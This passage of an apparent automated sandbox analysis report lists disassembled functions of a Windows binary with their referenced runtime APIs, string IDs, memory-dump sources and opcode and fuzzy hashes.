                              • Opcode Fuzzy Hash: 4cd326765fddf6ee5ae50fb6fe893d70e89acdbe86aaa600a8a96f25d9ecc1a4
                              • Instruction Fuzzy Hash: F8113662F0D25265FBB4BF21A5122B8E3545B41BD0FC49131EE8D23792EE2CD4829312
                              Function 00007FF733B27606 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B2768A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 2fa7aec8512e692d7fd9d5ec0117e868d8e5930ae364b7767173d04e92532ae7
                              • Instruction ID: 4e3d9bb824cfc24ccebc018a1abce6754cdc460b51becf8c0929c624cd598c00
                              • Opcode Fuzzy Hash: 2fa7aec8512e692d7fd9d5ec0117e868d8e5930ae364b7767173d04e92532ae7
                              • Instruction Fuzzy Hash: 4A113662F0C25261FBB5BF21B5122F8A2544B41BD0FC49231EE8C23786EE2CD4829312
                              Function 00007FF733B27556 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B275DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 7932d967278455050f89037cdbce48caaf5e950db3d5112e445d3eb9c5e44873
                              • Instruction ID: 882fc63c982bdf6da915538cc8498ba5351bf218d871db3f1f43a6f30bdd405f
                              • Opcode Fuzzy Hash: 7932d967278455050f89037cdbce48caaf5e950db3d5112e445d3eb9c5e44873
                              • Instruction Fuzzy Hash: FB113662E0C25265FBB4BF21B5122BCE3545F41BD0FC49231EE8D23782EE2CD4829312
                              Function 00007FF733B27A06 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B27A8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: ed8b61bfa3aa3966e17749776b9835764547fc963efd14187ce03687a2165f3a
                              • Instruction ID: 1d36b23016e6050c77167c72f13a3c9551dfabec9a4eb0a5c9c115bccb026877
                              • Opcode Fuzzy Hash: ed8b61bfa3aa3966e17749776b9835764547fc963efd14187ce03687a2165f3a
                              • Instruction Fuzzy Hash: 2F110662F0D25265FBB5BF21B5122FDA2545F02BD0F849131DD8D23782EE2CD5829315
                              Function 00007FF733B27956 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B279DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 6bfd6d32840ca26c0508489f0ca21df509997cc2956d8747d2bac04db38e3302
                              • Instruction ID: 83a39cf250b60db0e43d942b41aa3b052d94add9f730b646262ed0a4e473f639
                              • Opcode Fuzzy Hash: 6bfd6d32840ca26c0508489f0ca21df509997cc2956d8747d2bac04db38e3302
                              • Instruction Fuzzy Hash: BA113662E0D35275FBB57B26B9126F892544F01BD0F849131ED8C23782EE2CD5829311
                              Function 00007FF733B3C4C6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C54A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: f05ab3a5cb06561f2fb7671e3f745793295ef78d2580a3253cc12aabff8d7c0a
                              • Instruction ID: 7a2eae099e881df2a3e9f5155b42574081c0c3fd773be1cd9702d186ec6b3dab
                              • Opcode Fuzzy Hash: f05ab3a5cb06561f2fb7671e3f745793295ef78d2580a3253cc12aabff8d7c0a
                              • Instruction Fuzzy Hash: 4711E352F0936264FBB5BB21A5122B8A3545F41BD0F845031DD8D23B82EE2CD5829312
                              Function 00007FF733B3C2D6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C35A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: f4f6616e77173b6257ac45afc6f527e7f8497fa91319ecac721a07a6cc31935a
                              • Instruction ID: cae326ead9bed351102696124d21b54e0990b046f2129a887f017bd8e4571f3c
                              • Opcode Fuzzy Hash: f4f6616e77173b6257ac45afc6f527e7f8497fa91319ecac721a07a6cc31935a
                              • Instruction Fuzzy Hash: FE110652F0D26264FBB5BF21A5512FDA3545B02BD0F845031DE8D37B82EE3DE9829352
                              Function 00007FF733B3C226 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C2AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 9186f3425156ae4fdf1f7b13b562461a5eec8fa0a4da13053dd0938f3ccbc4dc
                              • Instruction ID: fbdc6c0802f10402a6783dd8cf11426705ad68efb02facb1d02c51fb4350e8ec
                              • Opcode Fuzzy Hash: 9186f3425156ae4fdf1f7b13b562461a5eec8fa0a4da13053dd0938f3ccbc4dc
                              • Instruction Fuzzy Hash: 82110652F0D26264FBB5BB61A9112B9A2545F06BD0FC49031DD8D23B92EE2DD5829312
                              Function 00007FF733B3C176 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C1FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: 9a8637450584c72add85e1a597ec19a8ac1f1da29dbbb8345c0a7fb4af5efb0e
                              • Instruction ID: 8f350a84bc6e4eb4c1d6afd2c7d149b6f5573785919d431223920fd03f3b7f75
                              • Opcode Fuzzy Hash: 9a8637450584c72add85e1a597ec19a8ac1f1da29dbbb8345c0a7fb4af5efb0e
                              • Instruction Fuzzy Hash: 08110652F0D66264FBB5BF21A5112BDA3545B02BD0F845131DE8D33B82EE2DE982A312
                              Function 00007FF733B3C626 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C6AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: d7784f20b144773193b11197b57b7a7eb58c40045be3d9a1268baebb15ee95c8
                              • Instruction ID: 7f20bf09aa8d75c59bf605aeef763c0c2aec6f509aa81cd8174b0f9ca5a8c2a3
                              • Opcode Fuzzy Hash: d7784f20b144773193b11197b57b7a7eb58c40045be3d9a1268baebb15ee95c8
                              • Instruction Fuzzy Hash: 7411E352F0972264FBB5BF21A5112B8A3545F05BD0F846031DD8D23B82EE2CD5829312
                              Function 00007FF733B3C576 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF733A9DD00: RtlCaptureContext.KERNEL32 ref: 00007FF733A9DD7E
                                • Part of subcall function 00007FF733A9DD00: RtlUnwindEx.KERNEL32 ref: 00007FF733A9DD9C
                                • Part of subcall function 00007FF733A9DD00: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF733A9DDA2
                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF733B3C5FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabortstrcmp
                              • String ID: POSIX
                              • API String ID: 1239617336-397921758
                              • Opcode ID: a075ec99c4df5d5b4f2026d38fbf93160bca79d10d5fc4359d5fde786abe916e
                              • Instruction ID: cb265622b9cc0a4c887426946d2f4865b0debf2a585b15d1c31d955247a71602
                              • Opcode Fuzzy Hash: a075ec99c4df5d5b4f2026d38fbf93160bca79d10d5fc4359d5fde786abe916e
                              • Instruction Fuzzy Hash: 15110652F0D32264FBB5BB21A5122F893545F45BD0F849031DD8C33B86EF2CD5829312
                              Function 00007FF733A95CB0 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: std$string literal
                              • API String ID: 0-2980153874
                              • Opcode ID: a23c60d694b46257160971645a4ddf076172aa222e1efb1fcebacd7c254f5923
                              • Instruction ID: d1e47a2763f71c0349714787477184ad9ef0ae7fe23cb8f3655aae503fe47e05
                              • Opcode Fuzzy Hash: a23c60d694b46257160971645a4ddf076172aa222e1efb1fcebacd7c254f5923
                              • Instruction Fuzzy Hash: 9FB1017290974A66E7F4AF25D842B78B3E1EB01B94FD44130EA0D37784DE3DE891A390
                              Function 00007FF733B05EFC Relevance: 2.8, APIs: 2, Instructions: 255COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CaptureContextUnwindabort
                              • String ID:
                              • API String ID: 747564614-0
                              • Opcode ID: f4c544c4c3d13d6e1be4934f89de58da30b1fa86adc8fb76eb6d6c54080a6608
                              • Instruction ID: f8dcbff4e7cc65959bc635c53215181db3bdcf0b7b1d056074894bb454a3f679
                              • Opcode Fuzzy Hash: f4c544c4c3d13d6e1be4934f89de58da30b1fa86adc8fb76eb6d6c54080a6608
                              • Instruction Fuzzy Hash: D1912822B09642A5EAB0AF16D54077DA761FB05B84F888031DFDD1BB91DF3CE491E312
                              Function 00007FF733AC47F0 Relevance: 2.6, APIs: 1, Instructions: 1382COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1d9c6b25a8863aeed5302d40da96f081816837cbf4af1d49f0bfa4abaa6d3a0
                              • Instruction ID: 052f754b19aba0d90c2c71eb6636f536a356a3dd5acbcdaa56b50d2c5dcda09c
                              • Opcode Fuzzy Hash: f1d9c6b25a8863aeed5302d40da96f081816837cbf4af1d49f0bfa4abaa6d3a0
                              • Instruction Fuzzy Hash: DBD29032608BC595EBB19F26E4407AEBBA0F784B94F844525EEDD93BA8DF38D440D710
                              Function 00007FF733B39440 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                              • API String ID: 3510742995-2669816585
                              • Opcode ID: 937726a99a2037681dc4c9c414072be5328be6e3fec586ee0a06fb5787e7fae4
                              • Instruction ID: 0243c65809b19d1446ff6ac6013a37d8cae5cb53023262a57baa26b5786758ea
                              • Opcode Fuzzy Hash: 937726a99a2037681dc4c9c414072be5328be6e3fec586ee0a06fb5787e7fae4
                              • Instruction Fuzzy Hash: 57F0F6AAE05A8891EA50FF25D401098A321F75DF50FC59132DDCC23315CE3DD5A2D705
                              Function 00007FF733B35600 Relevance: 2.5, Strings: 2, Instructions: 33COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
